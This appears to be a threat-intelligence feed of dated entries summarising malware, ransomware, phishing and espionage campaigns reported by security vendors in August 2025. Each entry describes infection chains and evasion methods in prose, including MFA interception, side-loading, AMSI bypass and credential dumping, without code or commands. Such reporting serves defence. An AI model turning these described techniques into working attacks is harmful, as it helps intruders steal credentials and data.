Researchers at ANY.RUN have identified Salty 2FA, a newly emerging Phishing-as-a-Service (PhaaS) platform built to harvest Microsoft 365 credentials while bypassing multi-factor authentication (MFA). The framework employs a multi-stage execution chain and advanced evasion methods to evade detection. It hosts fake login pages under [.]ru subdomains and delivers them through obfuscated JavaScript. Salty 2FA is capable of intercepting multiple forms of MFA, including SMS codes, authentication app push notifications, voice-based OTPs, and phone call verifications. This enables attackers to compromise accounts even when MFA protections are enabled. Since late July 2025, the platform has been actively deployed across industries in both the United States and European Union, with phishing lures tailored to specific sectors and organizations.
Source: https://any.run/cybersecurity-blog/salty2fa-technical-analysis/
2025-08-26
FreeVPN_Chrome_Extension_Captures_User_Data
MEDIUM
Intel Source:
Koi Security
Intel Name:
FreeVPN_Chrome_Extension_Captures_User_Data
Date of Scan:
2025-08-26
Impact:
MEDIUM
Summary:
Researchers at Koi Security have identified that the Chrome extension FreeVPN.One, recently rebranded as “AI Threat Detector”, is operating as spyware. The extension secretly takes screenshots of every website a user visits and exfiltrates them to attacker-controlled servers without user consent. The stolen screenshots include login credentials, financial details, personal photos, company documents, and even location data. This extension initially launched as a legitimate VPN but gradually evolved into a malicious tool through incremental updates in 2025. The attackers employ AES-256-GCM with RSA encryption and domain rotation to evade network monitoring.
Source: https://www.koi.security/blog/spyvpn-the-vpn-that-secretly-captures-your-screen#heading-5
2025-08-26
UNC6384_Captive_Portal_Hijack_Delivers_SOGU_SEC
MEDIUM
Intel Source:
Google Threat Intelligence
Intel Name:
UNC6384_Captive_Portal_Hijack_Delivers_SOGU_SEC
Date of Scan:
2025-08-26
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence Group (GTIG) have observed a captive-portal hijacking campaign attributed to PRC-nexus actor UNC6384 that targets diplomats. The operation silently reroutes routine browser connectivity probes through compromised edge devices, inserting an adversary-in-the-middle that serves a fake “plugin update” page. Victims who accept the lure receive a digitally signed downloader, STATICPLUGIN, which in turn pulls an MSI and side-loads CANONSTAGER. CANONSTAGER decrypts and executes the memory-only backdoor SOGU.SEC, granting the actor remote command shell, file transfer and host reconnaissance. GTIG notes the use of valid code-signing certificates, HTTPS lures and custom API hashing to reduce detection and extend dwell time. Campaign telemetry shows primary focus on government and diplomatic networks in Southeast Asia, with infrastructure touching additional global entities, indicating wider collection priorities. Successful compromise enables persistent access and covert exfiltration of sensitive state information.
Source: https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/
2025-08-25
TianQing_Blocks_Silver_Fox_Trojan_by_Default
MEDIUM
Intel Source:
Qi'anxin Threat Intelligence Center
Intel Name:
TianQing_Blocks_Silver_Fox_Trojan_by_Default
Date of Scan:
2025-08-25
Impact:
MEDIUM
Summary:
Qi'anxin Threat Intelligence Center has identified that the Silver Fox (Ghost) Trojan is being delivered through installer packages that carry valid Chinese code-signing certificates, allowing the malware’s loader to decrypt and run the backdoor directly in memory. Once executed, the threat injects itself into explorer.exe to establish an in-memory command-and-control channel while leaving no files on disk. This fileless approach, coupled with legitimate signatures, bypasses signature-based AV and many EDR products. Operators gain remote access that can support espionage tasks such as command execution and data collection, though no destructive activity has been observed. Campaigns attributed to foreign APT groups have repeatedly targeted organisations within China, illustrating continued interest in covert intelligence gathering against domestic entities.
Source: https://mp.weixin.qq.com/s?__biz=MzI5Mzg5MDM3NQ==&mid=2247498528&idx=1&sn=c3b6d66eb3c426e906fc12601a776fdc&poc_token=HJeXpWijUZm0zzCNaGnF_KVPFRhE0aUubPtOzf7K
2025-08-25
Fake_Digital_Signature_Update_Campaign
LOW
Intel Source:
Cert-AGID
Intel Name:
Fake_Digital_Signature_Update_Campaign
Date of Scan:
2025-08-25
Impact:
LOW
Summary:
Researchers from CERT-AGID have identified a phishing campaign targeting multiple Italian public administrations. The attackers send spear-phishing emails masquerading as urgent notifications regarding a “digital signature” security update, instructing recipients to download a ZIP archive containing a VBS installer script. Once executed, the script downloads and installs a signed MSI package for Action1, a legitimate remote management tool. This gives attackers persistent administrative access to the compromised systems.
Source: https://cert-agid.gov.it/news/falsa-patch-per-firma-digitale-diffonde-malware/
2025-08-24
BQTLock_Ransomware_Double_Extortion_RaaS_Targets_Windows
MEDIUM
Intel Source:
K7 Labs
Intel Name:
BQTLock_Ransomware_Double_Extortion_RaaS_Targets_Windows
Date of Scan:
2025-08-24
Impact:
MEDIUM
Summary:
Researchers at K7 Security Labs have identified BQTLock as an emerging ransomware-as-a-service (RaaS) family first observed in mid-July 2025. Operated by a threat actor using the handle “ZeroDayX,” the service arms affiliates with a point-and-click builder, host-wide encryptor and a Tor-based leak site to enable classic double-extortion campaigns. The malware applies hybrid AES-256/RSA-4096 encryption, appends “.bqtlock” to files and threatens public release of stolen data if payment is not received within 48 hours. Before encryption it collects host details, screenshots and logs, exfiltrating them through a Discord webhook to strengthen extortion leverage. BQTLock features anti-debug checks, multiple UAC-bypass paths, process hollowing, scheduled-task persistence and deletion of shadow copies, all of which complicate response and recovery.
Source: https://labs.k7computing.com/index.php/examining-the-tactics-of-bqtlock-ransomware-its-variants/
2025-08-24
TA_NATALSTATUS_Cryptojacking_Campaign
MEDIUM
Intel Source:
CloudSek
Intel Name:
TA_NATALSTATUS_Cryptojacking_Campaign
Date of Scan:
2025-08-24
Impact:
MEDIUM
Summary:
CloudSEK researchers have uncovered an advanced cryptojacking campaign operated by the group TA-NATALSTATUS, active since 2020, that exploits misconfigured Redis servers. The attackers leverage malicious cron jobs to gain root-level access without needing privilege escalation. Their tools incorporate binary hijacking, command obfuscation, and timestamp manipulation, enabling them to evade detection. The campaign follows a four-stage lifecycle (implantation, setup, lateral scanning, and persistence) in which each compromised machine automatically searches for additional Redis servers. Once inside, the attackers disable SELinux, firewalls, and competing malware to monopolize CPU resources for Monero mining. Victims have been observed across the U.S., Europe, Russia, India, and other regions, showing the campaign’s global scale.
Source: https://www.cloudsek.com/blog/the-ghost-in-the-machine-the-complete-dossier-on-ta-natalstatus-and-the-cryptojacking-turf-war
2025-08-24
QuirkyLoader_Drops_Infostealers_and_RATs
MEDIUM
+
Intel Source:
IBM-X Force
Intel Name:
QuirkyLoader_Drops_Infostealers_and_RATs
Date of Scan:
2025-08-24
Impact:
MEDIUM
Summary:
IBM X-Force researchers have identified a new Windows malware loader called QuirkyLoader which has been active since November 2024. The malware is distributed through spam emails containing password-protected archives. Each archive typically includes a legitimate executable, an encrypted payload, and a malicious DLL file. When executed, QuirkyLoader leverages DLL side-loading to run the malicious DLL, which then performs process hollowing and decrypts the final payload directly in memory. QuirkyLoader has been observed delivering well-known malware families such as Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger. These payloads enable credential theft and provide attackers with full remote access to compromised systems. Recent campaign activity shows targeting of Nusoft employees in Taiwan, along with opportunistic attacks against individuals in Mexico.
Source: https://www.ibm.com/think/x-force/ibm-x-force-threat-analysis-quirkyloader
2025-08-23
WarLock_Hits_Colt_via_SharePoint_Zero_Day
MEDIUM
+
Intel Source:
The Hacker Wire
Intel Name:
WarLock_Hits_Colt_via_SharePoint_Zero_Day
Date of Scan:
2025-08-23
Impact:
MEDIUM
Summary:
The Hacker Wire researchers have observed that the WarLock ransomware group leveraged the zero-day CVE-2025-53770 in Microsoft SharePoint to gain SYSTEM-level access to Colt Technology Services’ exposed portal. After initial exploitation, the attackers deployed a custom loader and PowerShell scripts to pivot across more than ten internal Windows servers, escalating privileges and disabling security controls. WarLock simultaneously exfiltrated sensitive corporate data, including salary tables and network diagrams, before encrypting approximately 30 TB of file shares with its proprietary ransomware payload. The campaign demonstrates the actor’s continued focus on unpatched Microsoft Office stack components and its capability to blend living-off-the-land binaries with DLL injection to evade EDR and SIEM detection.
Source: https://www.thehackerwire.com/warlock-hits-colt-via-cve%E2%80%912025%E2%80%9153770-sharepoint-exploit/
2025-08-23
COOKIE_SPIDER_SHAMOS_stealer_via_macOS_malvertising
MEDIUM
+
Intel Source:
Crowdstrike
Intel Name:
COOKIE_SPIDER_SHAMOS_stealer_via_macOS_malvertising
Date of Scan:
2025-08-23
Impact:
MEDIUM
Summary:
Researchers at CrowdStrike have observed the cyber-criminal group COOKIE SPIDER distributing a macOS variant of Atomic Stealer dubbed SHAMOS between June and August 2025. The campaign relied on search-engine malvertising that impersonated legitimate troubleshooting sites to lure users. Victims were instructed to execute a one-line Terminal command that silently downloaded a Bash installer, bypassed Gatekeeper, and deployed the Mach-O payload. SHAMOS then conducted anti-VM checks, harvested Keychain items, browser credentials and cryptocurrency wallet files via AppleScript, and exfiltrated them over HTTP. The stealer also dropped an additional botnet module and achieved persistence with LaunchDaemons to maintain long-term access.
Source: https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/
2025-08-23
CORNFLAKE_V3_Backdoor_Campaign
MEDIUM
+
Intel Source:
Google Cloud/Mandiant
Intel Name:
CORNFLAKE_V3_Backdoor_Campaign
Date of Scan:
2025-08-23
Impact:
MEDIUM
Summary:
Researchers from Mandiant have uncovered that the financially motivated group UNC5518 is compromising legitimate websites to deliver fake CAPTCHA pages in a campaign known as ClickFix. The group provides initial access as a service to other actors, including UNC5774, which leverages this access to deploy the CORNFLAKE.V3 backdoor. The malware is distributed in JavaScript and PHP variants and establishes HTTPS connections to attacker-controlled infrastructure for C2. Once installed, it collects system details, conducts reconnaissance, harvests credentials via Kerberoasting, and maintains persistence via registry run keys and scheduled tasks. The malware also abuses Cloudflare Tunnels for stealthy communications. Additionally, PowerShell-based droppers install Node.js on victim machines to execute the backdoor, incorporating anti-VM checks to evade detection.
Source: https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/
2025-08-23
SharePoint_Exploit_Enables_Enterprise_Wide_Ransomware
HIGH
+
Intel Source:
Trend Micro
Intel Name:
SharePoint_Exploit_Enables_Enterprise_Wide_Ransomware
Date of Scan:
2025-08-23
Impact:
HIGH
Summary:
Trend Micro reports that the Warlock ransomware group is exploiting unpatched on-premise Microsoft SharePoint servers to gain initial footholds, escalate privileges through malicious Group Policy Objects, and deploy a LockBit-derived payload across victim networks. Once inside, Warlock disables security tooling with a bespoke KillAV driver, performs credential dumping with Mimikatz, and propagates laterally via SMB and RDP configuration changes. Reconnaissance and domain-trust discovery are conducted using built-in Windows utilities before data is exfiltrated with a renamed RClone binary and files are encrypted with the .x2anylock extension. Victims span government, technology, finance, manufacturing, and critical-infrastructure sectors across North America, Europe, Asia, and Africa, underscoring broad operational scope. The campaign demonstrates rapid weaponisation of public-facing application flaws and highlights the business impact of delayed patching, ineffective privilege hygiene, and insufficient defense-in-depth.
Source: https://www.trendmicro.com/en_us/research/25/h/warlock-ransomware.html
2025-08-22
Attackers_Deliver_Multiple_Stealer_and_RAT_via_Clickfix
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Attackers_Deliver_Multiple_Stealer_and_RAT_via_Clickfix
Date of Scan:
2025-08-22
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered that several financially motivated threat actors are abusing the ClickFix technique to trick users into executing malicious commands via Windows Run, PowerShell, or the macOS Terminal. The campaigns, active since early 2024, deliver malware such as Lumma Stealer, ScreenConnect RAT, and Atomic macOS Stealer to steal credentials, compromise cryptocurrency wallets, and enable remote access. They achieve initial access through phishing, malvertising, and drive-by downloads. To evade detection, the attackers disguise scripts with misleading file names, employ multi-step obfuscation, and deploy fake Cloudflare security checks. Once executed, the malware rapidly exfiltrates sensitive data and gives attackers direct access for further malicious activity. Confirmed victims include organizations in the government, education, transportation, and finance sectors across Europe, North America, and Latin America.
Source: https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
2025-08-22
SendGrid_Campaign
LOW
+
Intel Source:
Cofense
Intel Name:
SendGrid_Campaign
Date of Scan:
2025-08-22
Impact:
LOW
Summary:
Cofense researchers have identified a phishing campaign that abuses SendGrid’s email services to steal user credentials. The attackers distribute phishing emails through SendGrid’s platform to evade security filters. The campaign leverages three main lures: a New Login Location Alert, an Elite Tier Promotion, and a Phone Number Changed Alert. All three emails use spoofed sender addresses, polished formatting, and official-looking logos to appear legitimate. Additionally, the attackers exploit an open redirect vulnerability to make their malicious links appear legitimate. Victims who click these links are redirected to a phishing site (loginportalsg[.]com) that closely mimics SendGrid’s official login page, tricking them into disclosing their credentials.
Source: https://cofense.com/blog/phishing-in-the-cloud-sendgrid-campaign-exploits-account-security
2025-08-21
APT36_Linux_Phishing_Targets_Indian_Defence
MEDIUM
+
Intel Source:
cloudsek
Intel Name:
APT36_Linux_Phishing_Targets_Indian_Defence
Date of Scan:
2025-08-21
Impact:
MEDIUM
Summary:
Researchers at CloudSEK have observed Pakistan-linked APT36 (aka Transparent Tribe) weaponising Linux .desktop shortcut files to spear-phish Indian defence and government personnel. The attackers email ZIP archives containing shortcuts disguised as procurement documents. When a victim clicks, the shortcut downloads a Go-based payload from Google Drive, writes it to /tmp, executes it, and displays a decoy PDF to reduce suspicion. The payload installs GNOME autostart entries and performs anti-analysis checks to evade sandboxes. It then initiates a WebSocket channel to external command-and-control infrastructure, enabling interactive commands and silent file exfiltration. These behaviours confirm an espionage objective focused on sensitive procurement and operational data, not destruction or extortion. The campaign demonstrates APT36’s expanding Linux capability, effective cloud-hosted delivery, and icon spoofing for user deception. Successful compromise grants persistent, covert access to India’s strategic defence ecosystem, posing significant national-security risk.
Source: https://www.cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery
2025-08-18
A_Large_Scale_Trojan_Campaign
MEDIUM
+
Intel Source:
Reasonlabs
Intel Name:
A_Large_Scale_Trojan_Campaign
Date of Scan:
2025-08-18
Impact:
MEDIUM
Summary:
ReasonLabs researchers have uncovered a large-scale Trojan campaign that leverages fake download websites to distribute malicious Chrome and Edge extensions, affecting over 300,000 Windows devices worldwide. Once installed, the malware deploys a staged PowerShell dropper that creates a scheduled task with deceptive names such as PrivacyBlocker_PR1 or NvOptimizerTaskUpdater_V2. This dropper executes a second-stage script entirely in memory to evade antivirus tools. The script then force-installs malicious browser extensions via registry policies, ensuring their persistence even in Developer Mode. It retrieves additional JavaScript, CSS, HTML, and image files from attacker-controlled domains to hijack search queries and redirect users to adversary-controlled search engines.
Source: https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign
2025-08-18
Interlock_Group_Evolving_Malware_Arsenal
HIGH
+
Intel Source:
Esentire
Intel Name:
Interlock_Group_Evolving_Malware_Arsenal
Date of Scan:
2025-08-18
Impact:
HIGH
Summary:
Researchers at eSentire have identified a sophisticated multi-stage campaign against Windows endpoints since September 2024, leveraging a compromised Kongtuke portal and a social-engineering lure dubbed ClickFix to execute malicious PowerShell payloads. Those payloads deploy a PHP-based backdoor (“Interlock RAT”) and a custom launcher via LOLBin abuse, followed by a NodeJS-based RAT (NodeSnake) for reconnaissance and data theft. A self-injecting C backdoor then establishes persistent C2 over TCP 443 using XOR-encrypted JSON, supports arbitrary command execution, and includes self-deletion routines to evade detection.
Source: https://www.esentire.com/blog/unmasking-interlock-groups-evolving-malware-arsenal
2025-08-18
DarkCloud_Stealer_VB6_Infection_Chain
MEDIUM
+
Intel Source:
unit42
Intel Name:
DarkCloud_Stealer_VB6_Infection_Chain
Date of Scan:
2025-08-18
Impact:
MEDIUM
Summary:
Researchers at Unit 42 have observed DarkCloud Stealer operators switching to a layered delivery chain that begins with phishing archives containing obfuscated JavaScript or WSF downloaders. These scripts retrieve a PowerShell loader that drops a ConfuserEx-protected .NET executable, which then injects a Visual Basic 6 payload into RegAsm.exe via process-hollowing. The revamped tooling leverages anti-tamper, control-flow, and constant-encoding protections alongside RC4 and 3DES-encrypted strings, complicating detection and analysis.
Source: https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/
2025-08-18
Blue_Locker_Ransomware
MEDIUM
+
Intel Source:
Resecurity
Intel Name:
Blue_Locker_Ransomware
Date of Scan:
2025-08-18
Impact:
MEDIUM
Summary:
Researchers at Resecurity have identified a new ransomware variant called Blue Locker, which is actively targeting Pakistan’s oil and gas sector as well as multiple government ministries. Blue Locker leverages a PowerShell-based loader to disable security controls, escalate privileges, and deploy its ransomware payload. Persistence is maintained through Registry Run keys, while shadow copies are deleted to hinder recovery efforts. Once executed, the malware appends the [.]Blue extension to encrypted files, selectively targets specific file types, and uses a combination of AES and RSA encryption to secure victim data. Ransom notes are dropped instructing victims to negotiate payment through email or instant messaging channels rather than a public leak site. Pakistan’s National CERT has attributed Blue Locker to the Shinra malware family, noting similarities with Conti and Black Basta.
Source: https://www.resecurity.com/blog/article/blue-locker-analysis-ransomware-targeting-oil-gas-sector-in-pakistan
2025-08-18
Plague_Linux_PAM_Backdoor
MEDIUM
+
Intel Source:
Polyswarm
Intel Name:
Plague_Linux_PAM_Backdoor
Date of Scan:
2025-08-18
Impact:
MEDIUM
Summary:
Researchers at PolySwarm have identified a new Linux backdoor, “Plague,” that integrates into the PAM authentication framework to provide attackers with covert SSH access and long-term persistence. The malware is deployed as a malicious authentication module, granting static backdoor credentials and bypassing security controls while remaining hidden through log suppression and environment tampering. Initial discovery was credited to Nextron Systems, with subsequent analysis showing multiple compiled variants across different Linux distributions, none of which were detected by antivirus engines. The implant demonstrates advanced anti-analysis features, including execution checks to evade sandboxes and layered obfuscation that evolved across successive builds, suggesting ongoing development and operator investment.
Source: https://blog.polyswarm.io/plague-linux-backdoor
2025-08-18
Silver_Fox_Trojan_via_Fake_Flash_Plugin
MEDIUM
+
Intel Source:
Medium(Knownsec 404)
Intel Name:
Silver_Fox_Trojan_via_Fake_Flash_Plugin
Date of Scan:
2025-08-18
Impact:
MEDIUM
Summary:
Researchers at Knownsec 404 have identified a sustained malware campaign involving the Silver Fox Trojan, which is delivered through counterfeit software posing as Flash plugins and popular Chinese applications. Active since 2022, the campaign employs phishing tactics and fake download sites mimicking services like Google Translate, WPS Office, and Bit Browser to trick users into downloading malicious installers. These downloads execute MSI or EXE payloads that deploy the Winos Trojan, a modular remote access tool that persists by registering itself in the Windows registry and side-loading malicious DLLs. The malware leverages obfuscation, Golang-based binaries, and shellcode loaders to evade detection and deliver a wide range of plug-ins capable of keylogging, clipboard access, and data exfiltration.
Source: https://medium.com/@knownsec404team/analysis-of-the-latest-silver-fox-attack-campaign-disguised-as-a-flash-plugin-7cd92d193de1
2025-08-18
Weaponized_SVG_Phishing
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
Weaponized_SVG_Phishing
Date of Scan:
2025-08-18
Impact:
MEDIUM
Summary:
Researchers at Seqrite have observed a spear-phishing campaign that delivers seemingly benign Scalable Vector Graphics files or cloud-hosted SVG links to enterprise users, aiming to seize cloud credentials. First detected on 7 August 2025, the attack relies on default Windows browsers to render the SVG, execute XOR-decoded JavaScript, funnel the session through a Cloudflare CAPTCHA, and present a counterfeit Microsoft 365 or Google Workspace login page for credential theft. Because SVGs lack macros or binaries, they evade standard attachment and URL filters, enabling rapid compromise of business email accounts that can support lateral movement, invoice fraud, and data exfiltration.
Source: https://www.seqrite.com/blog/unmasking-the-svg-threat-how-hackers-use-vector-graphics-for-phishing-attacks/
2025-08-18
Makop_RDP_Ransomware_Surge
LOW
+
Intel Source:
ASEC
Intel Name:
Makop_RDP_Ransomware_Surge
Date of Scan:
2025-08-18
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have observed a renewed Makop ransomware campaign that brute-forces exposed Remote Desktop Protocol services to gain initial access, escalates privileges with Mimikatz, and deploys a GUI-based encryptor using AES-256/RSA-1024. After foothold, operators install NirSoft credential tools, enabling lateral movement across Windows networks before encrypting hosts and deleting shadow copies and backup catalogs to obstruct recovery. The toolset and workflow resemble prior Crysis and Venus operations, suggesting shared infrastructure and a profit-driven objective. Activity dates to early 2024 and persists, with recent infections clustered in South Korea, underscoring continued targeting of organizations running internet-facing RDP with weak credentials.
Source: https://asec.ahnlab.com/en/89397/
2025-08-17
A_new_Variant_of_Raspberry_Robin
LOW
+
Intel Source:
Zscaler
Intel Name:
A_new_Variant_of_Raspberry_Robin
Date of Scan:
2025-08-17
Impact:
LOW
Summary:
Zscaler researchers have uncovered an advanced variant of the Raspberry Robin malware, also called Roshtyak, that has been active since 2021 and mainly spreads through infected USB drives targeting Windows systems. The malware now employs ChaCha-20 for network traffic encryption along with a modified RC4. Additionally, it exploits a recently disclosed Windows vulnerability (CVE-2024-38196) to gain SYSTEM privileges on compromised machines. Its C2 servers operate over TOR using onion domains that change dynamically with each sample. Notably, the malware enforces a one-week execution window: if not executed within this timeframe, it expires automatically.
Source: https://www.zscaler.com/blogs/security-research/tracking-updates-raspberry-robin
2025-08-17
UAC_0099_MATCHBOIL_Toolkit
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
UAC_0099_MATCHBOIL_Toolkit
Date of Scan:
2025-08-17
Impact:
MEDIUM
Summary:
Researchers at CERT-UA have identified that in early August 2025 the UAC-0099 group executed targeted spear-phishing campaigns against Ukrainian state authorities, Defense Forces and military-industrial enterprises, delivering an HTA-based loader that installs a C# payload. The loader, named MATCHBOIL, fetches and decodes additional modules and establishes persistence via a scheduled task. Once deployed, the MATCHWOK backdoor issues AES-encrypted PowerShell commands over HTTPS, incorporating checks to evade analysis tools such as IDA Pro and Wireshark. In parallel, the DRAGSTARE stealer collects system information and browser credentials, including DPAPI keys and SQLite databases, then conducts recursive searches for documents and archives.
Source: https://cert.gov.ua/article/6284949
2025-08-17
PXA_Stealer_Leveraging_Telegram_C2
MEDIUM
+
Intel Source:
Sentinel Labs
Intel Name:
PXA_Stealer_Leveraging_Telegram_C2
Date of Scan:
2025-08-17
Impact:
MEDIUM
Summary:
Researchers at Sentinel LABS have identified a sophisticated, ongoing infostealer campaign utilizing an evolved version of the Python-based PXA Stealer in conjunction with Telegram-based command-and-control infrastructure. Active since at least October 2024 and continuing into July 2025, this campaign demonstrates a highly customized deployment chain that employs signed software sideloading, encrypted archives, sandbox evasion, and legitimate-looking decoy documents to bypass detection. The malware targets Windows systems and Chromium-based browsers, harvesting an extensive array of data including credentials, browser cookies, crypto wallet information, and authentication tokens.
Source: https://www.sentinelone.com/labs/ghost-in-the-zip-new-pxa-stealer-and-its-telegram-powered-ecosystem/
2025-08-17
PS1Bot_Multi_Stage_Modular_Malware_Framework
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
PS1Bot_Multi_Stage_Modular_Malware_Framework
Date of Scan:
2025-08-17
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have observed PS1Bot, a multi-stage malware framework delivered via malvertising and SEO poisoning that targets Windows systems. The campaign begins with a malicious compressed archive that drops an obfuscated JavaScript downloader, which in turn retrieves PowerShell scripts keyed to the host’s drive serial number for C2 communications. Modules are dynamically compiled in-memory using PowerShell and C#, minimizing artifacts on disk while providing capabilities for antivirus detection, screen capture, keylogging and specialized cryptocurrency wallet theft. Infected hosts periodically poll an HTTP-based C2 server for new modules, facilitating rapid deployment of updated or additional functionality without writing payloads to disk.
Source: https://blog.talosintelligence.com/ps1bot-malvertising-campaign/
2025-08-17
LONEPAGE_Malware
LOW
+
Intel Source:
CERT UA
Intel Name:
LONEPAGE_Malware
Date of Scan:
2025-08-17
Impact:
LOW
Summary:
Researchers from CERT-UA have uncovered a targeted cyber espionage campaign against Ukrainian government agencies and media representatives since mid-2022. The threat actor employs malicious attachments such as .HTA, .EXE, .RAR and .LNK files delivered through email and instant messaging platforms to deploy a PowerShell-based loader called LONEPAGE, which fetches and executes additional payloads hosted within a remote text file. These downloaded components include the THUMBCHOP browser stealer, the CLOGFLAG keylogger and the Go-based backdoors SEAGLOW and OVERJAM, which facilitate credential theft and provide persistent remote access over HTTP, TOR, and SSH channels. The malware maintains persistence through scheduled tasks, while local network reconnaissance enables the identification and compromise of privileged systems to support lateral movement.
Source: https://cert.gov.ua/article/4818341
2025-08-17
Candiru_DevilsTongue_Spyware_Tracked_Globally
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
Candiru_DevilsTongue_Spyware_Tracked_Globally
Date of Scan:
2025-08-17
Impact:
MEDIUM
Summary:
Researchers at Insikt Group have uncovered new infrastructure linked to eight Candiru-associated clusters, comprising both victim-facing components used to deploy and control the sophisticated Windows malware DevilsTongue, and higher-tier operator infrastructure. DevilsTongue employs advanced techniques such as COM hijacking for persistence, a signed kernel-mode driver for stealthy API proxying, and in-memory execution of encrypted payloads, enabling it to extract files, browser data, LSASS credentials, and even encrypted Signal messages. The design of these clusters varies—some directly host victim-facing servers, while others use intermediary VPS layers or the Tor network to conceal activity. Five clusters, linked to Hungary and Saudi Arabia, are likely still active; one associated with Indonesia remained active until November 2024, while two tied to Azerbaijan remain unconfirmed due to a lack of observable infrastructure. The malware is primarily used to target high-value individuals such as politicians, business leaders, and community figures, exposing sensitive corporate and government information to potential espionage.
Source: https://assets.recordedfuture.com/content/dam/insikt-report-pdfs/2025/cta-2025-0805.pdf
2025-08-17
Curly_COMrades
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
Curly_COMrades
Date of Scan:
2025-08-17
Impact:
MEDIUM
Summary:
Bitdefender researchers have uncovered a new threat group dubbed Curly COMrades that has been active since mid-2024, targeting judicial and government agencies in Georgia and an energy distribution company in Moldova. The group focuses on stealing domain-level credentials through NTDS database extraction and LSASS memory dumps, enabling unrestricted lateral movement and long-term access. Curly COMrades employ stealthy techniques such as proxy tools (Resocks, SSH, Stunnel), scheduled tasks, compromised legitimate websites as relays, and remote command execution via curl or Atexec-like tools. Their tactics and targets indicate possible links to Russian intelligence operations, focusing on sustained network control and information theft.
Source: https://businessinsights.bitdefender.com/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds
2025-08-17
Scattered_Spider_Identity_Siege
MEDIUM
+
Intel Source:
Dark Atlas
Intel Name:
Scattered_Spider_Identity_Siege
Date of Scan:
2025-08-17
Impact:
MEDIUM
Summary:
Researchers at Darkatlas have observed Scattered Spider (UNC3944) pivoting from credential phishing to full-scale identity takeovers by replicating Okta login portals and weaponising Evilginx MitM proxies to hijack session tokens. Late-April 2025 attacks disrupted Marks & Spencer, Co-op and Harrods in the United Kingdom, mirroring the group’s 2023 compromises of MGM Resorts and Caesars Palace in the United States. The actor cycles clusters of NiceNIC-registered domains behind Cloudflare, Virtuo and Njalla infrastructure to frustrate takedowns. Targeted industries include retail, hospitality, financial services, telecommunications and cloud SaaS providers, underscoring a profit-driven campaign. The newly formed “Scattered LAPSUS$ Hunters” Telegram channel broadens extortion tactics with leak threats and unverified zero-day claims, signalling intent to escalate against government and luxury brands.
Source: https://darkatlas.io/blog/scattered-spider-unc3944-a-comprehensive-and-detailed-threat-profile
2025-08-16
Oyster_Loader_Targets_Admins_via_Malvertising
MEDIUM
+
Intel Source:
Cato
Intel Name:
Oyster_Loader_Targets_Admins_via_Malvertising
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Researchers at Cato have identified an ongoing July–August 2025 malvertising campaign impersonating the official PuTTY download site to compromise technically skilled administrators and engineers. The operation delivers a trojanized installer hosted on a compromised WordPress real-estate domain, initiating a modular loader that retrieves its payload from a cloud CDN at runtime. The malware masks C2 traffic through spoofed update headers and maintains resilience with a scheduled task executing every three minutes.
Source: https://www.catonetworks.com/blog/cato-ctrl-oyster-malware-campaign/
2025-08-16
A_New_Variant_of_FireWood_Backdoor
MEDIUM
+
Intel Source:
Intezer
Intel Name:
A_New_Variant_of_FireWood_Backdoor
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Researchers at Intezer have discovered a new variant of the FireWood backdoor targeting Linux systems. This version employs kernel-level rootkit modules and TEA-based encryption to evade detection and maintain persistent access. Once installed, it enables attackers to execute commands, collect system information and credentials, and conduct covert monitoring of compromised systems. It incorporates more reliable communication with its C2 servers and the ability to determine the operating system even when certain files are missing. The malware also maintains persistence by modifying system startup files. The attackers are believed to gain initial access through web shells on compromised Linux desktops.
Source: https://intezer.com/blog/threat-bulletin-firewood/
2025-08-16
A_Deep_Analysis_of_Donut_Malware
LOW
+
Intel Source:
Unit42
Intel Name:
A_Deep_Analysis_of_Donut_Malware
Date of Scan:
2025-08-16
Impact:
LOW
Summary:
Unit42 researchers analyzed a Donut-generated shellcode loader designed to execute .NET assemblies directly in memory with a very small footprint. It leverages a call/pop/sub technique to determine its current location in memory, enabling it to run from any position without relying on a fixed address. The loader dynamically resolves required APIs (VirtualProtect) to mark its memory buffer as executable before loading and executing the payload. It also includes a disable_amsi function to bypass Windows Anti-Malware Scan Interface, preventing security tools from scanning the code. Additionally, the malware effectively evades signature-based detection and static analysis.
Source: https://unit42.paloaltonetworks.com/donut-malware-analysis-tutorial/
2025-08-16
LeeMe_Ransomware
MEDIUM
+
Intel Source:
Cofense
Intel Name:
LeeMe_Ransomware
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Researchers at Cofense have identified a new ransomware variant dubbed LeeMe Ransomware, distributed through spoofed SAP Ariba Quote emails containing a password-protected ZIP archive designed to evade sandbox detection. Once executed, the malware installs a deceptive SAP GUI and encrypts files using AES-256 encryption. The campaign is financially motivated, demanding a ransom of 0.46900 BTC. LeeMe also includes a built-in keylogger and credential stealer that activates upon detecting predefined sensitive keywords and exfiltrates data over GoFile and the Telegram Bot API. The ransomware presents victims with a payment demand, imposing a 48-hour deadline and providing contact through ProtonMail.
Source: https://cofense.com/blog/this-sap-ariba-quote-isn-t-what-it-seems-it-s-ransomware
2025-08-16
APT_Sidewinder_Target_South_Asian_Countries
LOW
+
Intel Source:
Hunt.IO
Intel Name:
APT_Sidewinder_Target_South_Asian_Countries
Date of Scan:
2025-08-16
Impact:
LOW
Summary:
